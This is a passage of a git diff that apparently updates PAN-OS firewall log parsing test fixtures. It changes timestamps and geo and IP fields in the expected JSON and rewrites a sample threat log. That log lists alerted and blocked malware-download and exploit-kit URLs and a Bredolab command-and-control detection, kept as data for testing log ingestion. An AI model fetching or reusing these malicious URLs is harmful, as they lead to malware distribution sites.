"America/New_York", @@ -766,7 +766,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081650479Z", + "ingested": "2021-12-09T13:42:57.367044500Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:00:55,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -795,7 +795,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081660804Z", + "ingested": "2021-12-09T13:42:57.367050400Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:00:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", 
@@ -824,7 +824,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081671110Z", + "ingested": "2021-12-09T13:42:57.367054600Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:35,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -853,7 +853,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081682326Z", + "ingested": "2021-12-09T13:42:57.367059600Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20,192.168.0.2,,edit,admin,Web,Succeeded, vsys vsys1 profiles data-objects PII,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -882,7 +882,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081693413Z", + "ingested": "2021-12-09T13:42:57.367065600Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -911,7 +911,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081703939Z", + "ingested": "2021-12-09T13:42:57.367070500Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", 
@@ -940,7 +940,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-08T12:37:00.081714479Z", + "ingested": "2021-12-09T13:42:57.367076200Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -961,27 +961,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1000,7 +999,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", 
@@ -1034,7 +1033,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=", + "community_id": "1:CpnxxiYk2GolQXL1AiyOIq2jeIE=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1072,14 +1071,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:37:00.081727444Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:42:57.367080500Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log index b493a709848..a21b1c1c97a 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log 
@@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 
04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 
04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 
09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 
09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:47 1,2012/10/30 
09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:51:33 1,2012/10/30 
09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, -Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
